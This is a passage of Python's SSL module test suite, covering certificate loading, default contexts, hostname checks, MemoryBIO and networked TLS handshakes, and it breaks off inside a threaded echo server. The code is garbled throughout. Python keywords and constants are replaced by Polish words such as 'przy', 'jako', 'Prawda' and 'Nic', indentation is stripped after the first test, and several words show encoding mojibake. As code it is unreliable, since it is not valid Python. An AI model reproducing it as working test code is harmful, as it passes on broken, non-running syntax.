    def test_cert_store_stats(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        self.assertEqual(ctx.cert_store_stats(),
                         {'x509_ca': 0, 'crl': 0, 'x509': 0})
        ctx.load_cert_chain(CERTFILE)
        self.assertEqual(ctx.cert_store_stats(),
                         {'x509_ca': 0, 'crl': 0, 'x509': 0})
        ctx.load_verify_locations(CERTFILE)
        self.assertEqual(ctx.cert_store_stats(),
                         {'x509_ca': 0, 'crl': 0, 'x509': 1})
        ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
        self.assertEqual(ctx.cert_store_stats(),
                         {'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE jest nie flagged jako X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but SVN_PYTHON_ORG_ROOT_CERT jest a CA cert
ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
przy open(SVN_PYTHON_ORG_ROOT_CERT) jako f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(Prawda), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, Nic)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
przy support.EnvironmentVarGuard() jako env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
przy support.EnvironmentVarGuard() jako env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertPrawda(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
przy open(SIGNING_CA) jako f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_DH_USE", 0),
getattr(ssl, "OP_SINGLE_DH_USE", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertNieprawda(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=Prawda)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertPrawda(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertNieprawda(ctx.check_hostname)
# Requires CERT_REQUIRED albo CERT_OPTIONAL
przy self.assertRaises(ValueError):
ctx.check_hostname = Prawda
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertNieprawda(ctx.check_hostname)
ctx.check_hostname = Prawda
self.assertPrawda(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = Prawda
self.assertPrawda(ctx.check_hostname)
# Cannot set CERT_NONE przy check_hostname enabled
przy self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = Nieprawda
self.assertNieprawda(ctx.check_hostname)
klasa SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same dla a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library oraz reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
przy self.assertRaises(ssl.SSLError) jako cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertPrawda(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass jest podnieลd
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
przy socket.socket() jako s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(Nieprawda)
przy ctx.wrap_socket(c, Nieprawda, do_handshake_on_connect=Nieprawda) jako c:
przy self.assertRaises(ssl.SSLWantReadError) jako cm:
c.do_handshake()
s = str(cm.exception)
self.assertPrawda(s.startswith("The operation did nie complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
klasa MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertNieprawda(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertNieprawda(bio.eof)
bio.write(b'foo')
self.assertNieprawda(bio.eof)
bio.write_eof()
self.assertNieprawda(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertNieprawda(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertPrawda(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertPrawda(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
dla i w range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
dla i w range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, Nic)
self.assertRaises(TypeError, bio.write, Prawda)
self.assertRaises(TypeError, bio.write, 1)
klasa NetworkedTests(unittest.TestCase):
def test_connect(self):
przy support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE)
sprรณbuj:
s.connect(("svn.python.org", 443))
self.assertEqual({}, s.getpeercert())
w_koลcu:
s.close()
# this should fail because we have no verification certs
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, ("svn.python.org", 443))
s.close()
# this should succeed because we specify the root cert
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
sprรณbuj:
s.connect(("svn.python.org", 443))
self.assertPrawda(s.getpeercert())
w_koลcu:
s.close()
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
przy support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
sprรณbuj:
self.assertEqual(0, s.connect_ex(("svn.python.org", 443)))
self.assertPrawda(s.getpeercert())
w_koลcu:
s.close()
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
przy support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
do_handshake_on_connect=Nieprawda)
sprรณbuj:
s.setblocking(Nieprawda)
rc = s.connect_ex(('svn.python.org', 443))
# EWOULDBLOCK under Windows, EINPROGRESS inaczejwhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait dla connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
dopรณki Prawda:
sprรณbuj:
s.do_handshake()
przerwij
wyjฤ
wszy ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
wyjฤ
wszy ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertPrawda(s.getpeercert())
w_koลcu:
s.close()
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should zwrรณฤ the original
# errno (mimicking the behaviour of non-SSL sockets).
przy support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
do_handshake_on_connect=Nieprawda)
sprรณbuj:
s.settimeout(0.0000001)
rc = s.connect_ex(('svn.python.org', 443))
jeลผeli rc == 0:
self.skipTest("svn.python.org responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
w_koลcu:
s.close()
def test_connect_ex_error(self):
przy support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
sprรณbuj:
rc = s.connect_ex(("svn.python.org", 444))
# Issue #19919: Windows machines albo VMs hosted on Windows
# machines sometimes zwrรณฤ EWOULDBLOCK.
self.assertIn(rc, (errno.ECONNREFUSED, errno.EWOULDBLOCK))
w_koลcu:
s.close()
def test_connect_with_context(self):
przy support.transient_internet("svn.python.org"):
# Same jako test_connect, but przy a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
sprรณbuj:
self.assertEqual({}, s.getpeercert())
w_koลcu:
s.close()
# Same przy a server hostname
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="svn.python.org")
s.connect(("svn.python.org", 443))
s.close()
# This should fail because we have no verification certs
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, ("svn.python.org", 443))
s.close()
# This should succeed because we specify the root cert
ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
sprรณbuj:
cert = s.getpeercert()
self.assertPrawda(cert)
w_koลcu:
s.close()
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n oraz 1.0.0, jako a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) dla this test to be portable across OpenSSL releases.
przy support.transient_internet("svn.python.org"):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
sprรณbuj:
cert = s.getpeercert()
self.assertPrawda(cert)
w_koลcu:
s.close()
# Same przy a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
sprรณbuj:
cert = s.getpeercert()
self.assertPrawda(cert)
w_koลcu:
s.close()
def test_connect_cadata(self):
przy open(CAFILE_CACERT) jako f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
przy support.transient_internet("svn.python.org"):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
przy ctx.wrap_socket(socket.socket(socket.AF_INET)) jako s:
s.connect(("svn.python.org", 443))
cert = s.getpeercert()
self.assertPrawda(cert)
# same przy DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
przy ctx.wrap_socket(socket.socket(socket.AF_INET)) jako s:
s.connect(("svn.python.org", 443))
cert = s.getpeercert()
self.assertPrawda(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket jako a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object przy makefile() shouldn't
# delay closing the underlying "real socket" (here tested przy its
# file descriptor, hence skipping the test under Windows).
przy support.transient_internet("svn.python.org"):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
ss.connect(("svn.python.org", 443))
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd jest still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
przy self.assertRaises(OSError) jako e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
przy support.transient_internet("svn.python.org"):
s = socket.socket(socket.AF_INET)
s.connect(("svn.python.org", 443))
s.setblocking(Nieprawda)
s = ssl.wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=Nieprawda)
count = 0
dopรณki Prawda:
sprรณbuj:
count += 1
s.do_handshake()
przerwij
wyjฤ
wszy ssl.SSLWantReadError:
select.select([s], [], [])
wyjฤ
wszy ssl.SSLWantWriteError:
select.select([], [s], [])
s.close()
jeลผeli support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
def _test_get_server_certificate(host, port, cert=Nic):
przy support.transient_internet(host):
pem = ssl.get_server_certificate((host, port))
jeลผeli nie pem:
self.fail("No server certificate on %s:%s!" % (host, port))
sprรณbuj:
pem = ssl.get_server_certificate((host, port),
ca_certs=CERTFILE)
wyjฤ
wszy ssl.SSLError jako x:
#should fail
jeลผeli support.verbose:
sys.stdout.write("%s\n" % x)
inaczej:
self.fail("Got server certificate %s dla %s:%s!" % (pem, host, port))
pem = ssl.get_server_certificate((host, port),
ca_certs=cert)
jeลผeli nie pem:
self.fail("No server certificate on %s:%s!" % (host, port))
jeลผeli support.verbose:
sys.stdout.write("\nVerified certificate dla %s:%s is\n%s\n" % (host, port ,pem))
_test_get_server_certificate('svn.python.org', 443, SVN_PYTHON_ORG_ROOT_CERT)
jeลผeli support.IPV6_ENABLED:
_test_get_server_certificate('ipv6.google.com', 443)
def test_ciphers(self):
remote = ("svn.python.org", 443)
przy support.transient_internet(remote[0]):
przy ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") jako s:
s.connect(remote)
przy ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") jako s:
s.connect(remote)
# Error checking can happen at instantiation albo when connecting
przy self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
przy socket.socket(socket.AF_INET) jako sock:
s = ssl.wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(remote)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added w OpenSSL 0.9.8
jeลผeli ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 nie available on %r" % ssl.OPENSSL_VERSION)
# sha256.tbs-internet.com needs SNI to use the correct certificate
jeลผeli nie ssl.HAS_SNI:
self.skipTest("SNI needed dla this test")
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
przy support.transient_internet("sha256.tbs-internet.com"):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(sha256_cert)
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="sha256.tbs-internet.com")
sprรณbuj:
s.connect(remote)
jeลผeli support.verbose:
sys.stdout.write("\nCipher przy %r jest %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
w_koลcu:
s.close()
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
przy support.transient_internet("svn.python.org"):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
sprรณbuj:
cert = s.getpeercert()
self.assertPrawda(cert)
w_koลcu:
s.close()
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
przy support.transient_internet("svn.python.org"):
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
przy ctx1.wrap_socket(s) jako ss:
ss.connect(("svn.python.org", 443))
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
klasa NetworkedBIOTests(unittest.TestCase):
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args) depending on the error we get
# (WANT_READ albo WANT_WRITE) move data between the socket oraz the BIOs.
timeout = kwargs.get('timeout', 10)
count = 0
dopรณki Prawda:
errno = Nic
count += 1
sprรณbuj:
ret = func(*args)
wyjฤ
wszy ssl.SSLError jako e:
# Note that we get a spurious -1/SSL_ERROR_SYSCALL for
# non-blocking IO. The SSL_shutdown manpage hints at this.
# It *should* be safe to just ignore SYS_ERROR_SYSCALL because
# przy a Memory BIO there's no syscalls (dla IO at least).
jeลผeli e.errno nie w (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE,
ssl.SSL_ERROR_SYSCALL):
podnieล
errno = e.errno
# Get any data z the outgoing BIO irrespective of any error, oraz
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data z the socket oraz put it w the incoming BIO.
jeลผeli errno jest Nic:
przerwij
albo_inaczej errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
jeลผeli buf:
incoming.write(buf)
inaczej:
incoming.write_eof()
jeลผeli support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
zwrรณฤ ret
def test_handshake(self):
przy support.transient_internet("svn.python.org"):
sock = socket.socket(socket.AF_INET)
sock.connect(("svn.python.org", 443))
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
ctx.check_hostname = Prawda
sslobj = ctx.wrap_bio(incoming, outgoing, Nieprawda, 'svn.python.org')
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNic(sslobj.cipher())
self.assertIsNic(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
jeลผeli 'tls-unique' w ssl.CHANNEL_BINDING_TYPES:
self.assertIsNic(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertPrawda(sslobj.cipher())
self.assertIsNic(sslobj.shared_ciphers())
self.assertPrawda(sslobj.getpeercert())
jeลผeli 'tls-unique' w ssl.CHANNEL_BINDING_TYPES:
self.assertPrawda(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
sock.close()
def test_read_write_data(self):
przy support.transient_internet("svn.python.org"):
sock = socket.socket(socket.AF_INET)
sock.connect(("svn.python.org", 443))
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, Nieprawda)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'GET / HTTP/1.0\r\n\r\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf[:5], b'HTTP/')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
sock.close()
sprรณbuj:
zaimportuj threading
wyjฤ
wszy ImportError:
_have_threads = Nieprawda
inaczej:
_have_threads = Prawda
z test.ssl_servers zaimportuj make_https_server
klasa ThreadedEchoServer(threading.Thread):
klasa ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
przy oraz without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = Nieprawda
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = Nic
threading.Thread.__init__(self)
self.daemon = Prawda
def wrap_conn(self):
sprรณbuj:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=Prawda)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
wyjฤ
wszy (ssl.SSLError, ConnectionResetError) jako e:
# We treat ConnectionResetError jako though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, dla example
# a mismatching protocol version, an invalid certificate,
# albo a low-level bug. This should be made more discriminating.
self.server.conn_errors.append(e)
jeลผeli self.server.chatty:
handle_error("\n server: bad connection attempt z " + repr(self.addr) + ":\n")
self.running = Nieprawda
self.server.stop()
self.close()
zwrรณฤ Nieprawda
inaczej:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
jeลผeli self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
jeลผeli support.verbose oraz self.server.chatty:
sys.stdout.write(" client cert jest " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(Prawda)
jeลผeli support.verbose oraz self.server.chatty:
sys.stdout.write(" cert binary jest " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
jeลผeli support.verbose oraz self.server.chatty:
sys.stdout.write(" server: connection cipher jest now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol jest now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
zwrรณฤ Prawda
def read(self):
jeลผeli self.sslconn:
zwrรณฤ self.sslconn.read()
inaczej:
zwrรณฤ self.sock.recv(1024)
def write(self, bytes):
jeลผeli self.sslconn:
zwrรณฤ self.sslconn.write(bytes)
inaczej:
zwrรณฤ self.sock.send(bytes)
def close(self):
jeลผeli self.sslconn:
self.sslconn.close()
inaczej:
self.sock.close()
def run(self):
self.running = Prawda
jeลผeli nie self.server.starttls_server:
jeลผeli nie self.wrap_conn():
zwrรณฤ
dopรณki self.running:
sprรณbuj:
msg = self.read()
stripped = msg.strip()
jeลผeli nie stripped:
# eof, so quit this handler
self.running = Nieprawda
self.close()
albo_inaczej stripped == b'over':
jeลผeli support.verbose oraz self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
zwrรณฤ
albo_inaczej (self.server.starttls_server oraz
stripped == b'STARTTLS'):
jeลผeli support.verbose oraz self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS z client, sending OK...\n")
self.write(b"OK\n")
jeลผeli nie self.wrap_conn():
zwrรณฤ
albo_inaczej (self.server.starttls_server oraz self.sslconn
oraz stripped == b'ENDTLS'):
jeลผeli support.verbose oraz self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS z client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = Nic
jeลผeli support.verbose oraz self.server.connectionchatty:
sys.stdout.write(" server: connection jest now unencrypted...\n")
albo_inaczej stripped == b'CB tls-unique':
jeลผeli support.verbose oraz self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique z client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
inaczej:
jeลผeli (support.verbose oraz
self.server.connectionchatty):
ctype = (self.sslconn oraz "encrypted") albo "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
wyjฤ
wszy OSError:
jeลผeli self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = Nieprawda
# normally, we'd just stop here, but dla the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=Nic, ssl_version=Nic,
certreqs=Nic, cacerts=Nic,
chatty=Prawda, connectionchatty=Nieprawda, starttls_server=Nieprawda,
npn_protocols=Nic, alpn_protocols=Nic,
ciphers=Nic, context=Nic):
jeลผeli context:
self.context = context
inaczej:
self.context = ssl.SSLContext(ssl_version
jeลผeli ssl_version jest nie Nic
inaczej ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs jeลผeli certreqs jest nie Nic
inaczej ssl.CERT_NONE)
jeลผeli cacerts:
